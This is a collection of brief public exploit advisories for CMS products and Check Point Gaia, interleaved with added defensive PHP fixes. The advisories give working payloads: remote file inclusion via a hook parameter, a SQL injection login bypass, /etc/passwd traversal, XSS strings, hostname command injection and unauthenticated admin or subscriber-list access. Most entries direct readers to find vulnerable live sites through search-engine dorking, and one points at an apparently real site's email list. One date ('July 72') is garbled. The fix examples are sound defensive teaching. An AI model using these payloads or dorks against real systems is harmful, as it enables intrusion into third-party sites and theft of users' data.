<pre><code>====================================================================================================================================<br />| # Title : WEBinsta Mailing Manager V1.3 Data Disclosure Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : Windows 10 Français V.(Pro) / browser : Mozilla Firefox 66.0.3(32-bit) |<br />| # Vendor : http://www.webinsta.com |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or other search engine.<br /><br />[+] Use payload : maillist/temp/email.txt<br /><br />[+] http://lolpriceshopinfo/maillist/temp/email.txt<br /><br />Greetings to :=================================================================<br />jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |<br />===============================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Wolf CMS v0.8.1 Add Admin Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : Windows 10 Français V.(Pro) / browser : Mozilla Firefox 66.0.3(32-bit) |<br />| # Vendor : http://www.wolfcms.org/ |<br />| # Dork : © Copyright 2014 Your name Wolf CMS Inside. |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or other search engine.<br /><br />[+] Suffers from an add administrator vulnerability because after the first installation, the installation file repeats the installation process.<br /><br />[+] Use payload : /wolf/install/<br /><br />[+] http://127.0.0.1/wolf/install/<br /><br />Greetings to :=================================================================<br />jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |<br />===============================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : WonderCMS v0.6-Beta File Inclusion Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : Windows 10 Français V.(Pro) / browser : Mozilla Firefox 66.0.3(32-bit) |<br />| # Vendor : http://wondercms.com/ |<br />| # Dork : ©2015 Your website | Powered by WonderCMS | Login |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or other search engine.<br /><br />[+] File : editInplace.php<br /><br />[+] Line 17 : <?php if(isset($_REQUEST['hook']))include($_REQUEST['hook']); ?><br /><br />[+] Use payload : /js/editInplace.php?hook=http://127.0.0.1/evil.php<br /><br />[+] http://127.0.0.1/wondercms/js/editInplace.php?hook=http://127.0.0.1/evil.php<br /><br />Greetings to :=================================================================<br />jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |<br />===============================================================================<br /></code></pre>
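<p>An added example, not WonderCMS code and not part of the advisory: the include from line 17 of editInplace.php rewritten so that the <code>hook</code> parameter can only select an entry from a fixed map. The hook names and file paths are hypothetical, and PHP 8.0 or later is assumed.</p>

```php
<?php
// Added example, not WonderCMS code. Hook names and file paths are hypothetical.
declare(strict_types=1);

// Fixed map from a public hook name to a file shipped with the application.
// The request can only pick a key; it never supplies a path or a URL.
const HOOKS = [
    'gallery' => __DIR__ . '/hooks/gallery.php',
    'contact' => __DIR__ . '/hooks/contact.php',
];

function resolve_hook(mixed $requested): ?string
{
    // Arrays (hook[]=x) and other non-string values are rejected outright.
    if (!is_string($requested)) {
        return null;
    }
    // Exact key lookup: a URL or a "../" sequence is simply not a key in the map.
    return HOOKS[$requested] ?? null;
}

// Vulnerable form quoted in the advisory, kept as a comment for comparison:
//   if (isset($_REQUEST['hook'])) include($_REQUEST['hook']);

// Read from $_GET only, so cookies and POST bodies cannot supply the value.
$hook = resolve_hook($_GET['hook'] ?? null);

if ($hook !== null && is_file($hook)) {
    include $hook;
} elseif (isset($_GET['hook'])) {
    // Unknown hook: refuse and log the raw value for later review.
    http_response_code(400);
    error_log('rejected hook parameter: ' . json_encode($_GET['hook']));
}
```

<p>Keeping <code>allow_url_include</code> off (the PHP default) blocks the remote-URL form of the request independently of this change, but it does not stop inclusion of local paths, which the map does.</p>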
<pre><code>====================================================================================================================================<br />| # Title : xzengine v.1.7 Add Admin Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : Windows 10 Français V.(Pro) / browser : Mozilla Firefox 66.0.3(32-bit) |<br />| # Vendor : https://codecanyon.net/ |<br />| # Dork : 2005-2007 Powered by xzengine v.1.7 beta 8 |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or other search engine.<br /><br />[+] Suffers from an add administrator vulnerability because after the first installation, the installation file repeats the installation process.<br /><br />[+] Use payload : /install/install.php?step=params<br /><br />[+] http://127.0.0.1/xzengine/admin<br /><br />Greetings to :=================================================================<br />jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |<br />===============================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Yourdoctor CMS v1.5 Insecure Direct Object Reference Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : Windows 10 Français V.(Pro) / browser : Mozilla Firefox 66.0.3(32-bit) |<br />| # Vendor : https://codecanyon.net/item/yourdoctor-medical-and-doctor-website-cms/20811493 |<br />| # Dork : "Lorem ipsum dolor sit amet, omnis signiferumque in mei, mei ex." |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or other search engine.<br /><br />[+] Unauthorized administrator access. Allows any visitor to download the subscriber list.<br /><br />[+] Use payload : /admin/subscriber-csv.php<br /><br />[+] http://127.0.0.1/admin/subscriber-csv.php<br /><br />Greetings to :=================================================================<br />jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |<br />===============================================================================<br /></code></pre>
<pre><code> =========================<br />Exploit Title: Hostname injection leads to Remote Code Execution RCE (Authenticated)<br />Product: Gaia Portal<br />Vendor: Checkpoint<br />Vulnerable Versions: R81.20 < Take 14, R81.10 < Take 95, R81 < Take 82 and R80.40 < Take 198<br />Tested Version: R81.10 (take 335)<br />Advisory Publication: July 27, 2023<br />Latest Update: July 72, 2023<br />Vulnerability Type: Improper Control of Generation of Code (Code Injection) [CWE-94]<br />CVE Reference: CVE-2023-28130<br />CVSS Severity: High<br />CVSS Score: CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H<br />Impact score: 8.4<br />Credit: Rick Verdoes & Danny de Weille (Hackify | pentests.nl)<br />=========================<br /><br /> I. BACKGROUND<br />-------------------------<br />Check Point Gaia Portal is an advanced web-based interface designed for the configuration of the Gaia platform, a security operating system that combines the strengths of both SecurePlatform and IPSO operating systems. The Gaia Portal allows for nearly all system configuration tasks to be performed through this interface.<br /><br /> II. VULNERABILITY<br />-------------------------<br />Check Point Gaia Portal has a vulnerability which allows an authenticated user with write permissions on the DNS settings to inject commands in a cgi script, leading to remote code execution on the operating system. The vulnerability lies in the parameter hostname in the web request /cgi-bin/hosts_dns.tcl, which is susceptible to command injection. This can be exploited by any user with a valid session, as long as the user has write permissions on the DNS settings. The injected commands are executed by the user 'Admin'.<br /><br /> III. Proof of Concept<br />-------------------------<br />hostname=name|`COMMAND`&domainname=test.local&save=1<br /><br /> IV. Impact<br />-------------------------<br />Successful exploitation allows a remote authenticated attacker to execute commands on the operating system.<br /><br /> V. References<br />-------------------------<br />Security advisories:<br />https://pentests.nl/pentest-blog/cve-2023-28130-command-injection-in-check-point-gaia-portal/<br />https://support.checkpoint.com/results/sk/sk181311<br /><br /><br /></code></pre>
<pre><code># Exploit Title:<br /># Date: 07/2023<br /># Exploit Author: Andrey Stoykov<br /># Version: 3.2<br /># Tested on: Windows Server 2022<br /># Blog: http://msecureltd.blogspot.com<br /><br /><br />XSS #1:<br /><br />File: roles.edit.post.php<br /><br />Line #57:<br /><br />[...]<br /><div class="field-wrap <?php echo $Form->error('roleTitle', false);?>"><br /> <?php echo $Form->label('roleTitle', 'Title'); ?><br /> <div class="form-entry"><br /> <?php echo $Form->text('roleTitle', $Form->get($details,<br />'roleTitle')); ?><br /> </div><br /> </div><br />[...]<br /><br /><br /><br />Steps to Reproduce:<br /><br />1. Login to application<br />2. Go to Roles<br />3. Select Title<br />4. Enter payload TEST"><img src=x onerror=alert(1)><br /><br /><br />// HTTP POST request<br /><br />POST /perch/perch/core/users/roles/edit/?id=1 HTTP/1.1<br />Host: 192.168.1.11<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)<br />Gecko/20100101 Firefox/114.0<br />[...]<br /><br />roleTitle=TEST%22%3e%3cimg+src%3dx+onerror%3dalert%281%29%3e&privs-perch%5b%5d=1&btnsubmit=Save+changes&formaction=core&token=0389a6698f1911a162fdb71328dd2af0<br /><br /><br />// HTTP response<br /><br />HTTP/1.1 200 OK<br />Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.2.4<br />[...]<br /><br />[...]<br /><a href="/perch/perch/core/users/roles/edit/?id=1">TEST"><img src=x<br />onerror=alert(1)></a><br />[...]<br /><br /></code></pre>
<pre><code># Exploit Title: JLex GuestBook 1.6.4 - Reflected XSS<br /># Exploit Author: CraCkEr<br /># Date: 01/08/2023<br /># Vendor: JLexArt<br /># Vendor Homepage: https://jlexart.com/<br /># Software Link: https://extensions.joomla.org/extension/contacts-and-feedback/guest-book/jlex-guestbook/<br /># Demo: https://jlexguestbook.jlexart.com/<br /># Tested on: Windows 10 Pro<br /># Impact: Manipulate the content of the site<br /><br /><br />## Greetings<br /><br />The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka<br />CryptoJob (Twitter) twitter.com/0x0CryptoJob<br /><br /><br />## Description<br /><br />The attacker can send the victim a link containing a malicious URL in an email or instant message<br />and can perform a wide variety of actions, such as stealing the victim's session token or login credentials.<br /><br /><br />Path: /u/perry-705<br /><br />GET parameter 'q' is vulnerable to XSS<br /><br />http://website/u/perry-705?q=[XSS]&wl=1<br /><br /><br />XSS Payloads:<br /><br />db8ck"onfocus="confirm(1)"autofocus="xwu0k<br /><br /><br />[-] Done<br /></code></pre>
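<p>An added example, not Perch or JLex code and not from either advisory: output encoding applied at the two sink types the <code>roleTitle</code> and <code>q</code> reports above describe, with the payloads they quote used as test input. The function names and markup are hypothetical, and placing <code>q</code> in a quoted <code>value</code> attribute is an assumption drawn from the shape of the payload.</p>

```php
<?php
// Added example, not Perch or JLex code. Function names and markup are hypothetical.
declare(strict_types=1);

// Encode for HTML text and for quoted attribute values. ENT_QUOTES covers both
// quote characters; ENT_SUBSTITUTE stops invalid UTF-8 from yielding an empty string.
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Element-content sink: the role title printed inside the link in the roles list.
function role_link(int $id, string $title): string
{
    return '<a href="/perch/perch/core/users/roles/edit/?id=' . $id . '">'
        . e($title) . '</a>';
}

// Attribute sink (assumed): the search term echoed back into value="...".
// The attribute has to stay quoted; encoding does not protect an unquoted one.
function search_box(string $q): string
{
    return '<input type="search" name="q" value="' . e($q) . '">';
}

// Payloads quoted in the two advisories, used here only as test input.
$stored    = 'TEST"><img src=x onerror=alert(1)>';
$reflected = 'db8ck"onfocus="confirm(1)"autofocus="xwu0k';

foreach ([role_link(1, $stored), search_box($reflected)] as $html) {
    // Count tag openings in the rendered markup: anything beyond the template's
    // own single element would mean input escaped its context.
    $opened = preg_match_all('/<[a-z]/i', $html);
    printf("%s\n  tags opened: %d\n", $html, $opened);
}
```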
<pre><code>====================================================================================================================================<br />| # Title : Cryptolive cms v1.0 Auth Bypass Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : Windows 10 Français V.(Pro) / browser : Mozilla Firefox 64.0.2 (32-bit) |<br />| # Vendor : https://scriptmafia.org/ |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or other search engine.<br /><br />[+] user & pass : 1'or'1'='1<br /><br />[+] Panel : https://127.0.0.1/cryptoinlivecom/admin/<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : CRM Education Akademik v9.0 Directory Traversal Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : Windows 10 Français V.(Pro) / browser : Mozilla Firefox 64.0.2 (32-bit) |<br />| # Vendor : http://p30vel.ir/ |<br />| # Dork : "media.php?module=home" |<br />====================================================================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking in Google or other search engine.<br /><br />[+] Use payload : downlot.php?file=\../../../../../../../../../../etc/passwd<br /><br />[+] http://127.0.0.1/akademik.stikes-aisyiyahbandungacid/downlot.php?file=\../../../../../../../../../../etc/passwd<br /><br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
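<p>An added example, not the CRM's code and not part of the advisory: a download handler that canonicalises the requested <code>file</code> value and serves it only if the result stays inside one directory. The base directory is hypothetical, and PHP 8.0 or later is assumed.</p>

```php
<?php
// Added example, not the CRM's code. The download directory is hypothetical.
declare(strict_types=1);

const DOWNLOAD_ROOT = '/var/www/app/files';

function resolve_download(string $root, string $requested): ?string
{
    // NUL bytes and backslashes (as in the advisory's "\../" prefix) are never
    // part of a legitimate file name here, so refuse them before touching disk.
    if ($requested === '' || strpbrk($requested, "\0\\") !== false) {
        return null;
    }
    $base = realpath($root);
    // realpath() collapses "../" and resolves symlinks; it returns false when
    // the target does not exist.
    $full = realpath($root . DIRECTORY_SEPARATOR . $requested);
    if ($base === false || $full === false || !is_file($full)) {
        return null;
    }
    // Containment check on the canonical path. The trailing separator keeps a
    // sibling such as /files-old from passing as a prefix match of /files.
    if (!str_starts_with($full, $base . DIRECTORY_SEPARATOR)) {
        return null;
    }
    return $full;
}

// Only a plain string parameter is accepted; file[]=x becomes an empty name.
$raw  = $_GET['file'] ?? '';
$path = resolve_download(DOWNLOAD_ROOT, is_string($raw) ? $raw : '');

if ($path === null) {
    // Same response for "missing" and "outside the root", so nothing is revealed
    // about which paths exist elsewhere on the server.
    http_response_code(404);
    exit;
}

header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="' . rawurlencode(basename($path)) . '"');
header('X-Content-Type-Options: nosniff');
readfile($path);
```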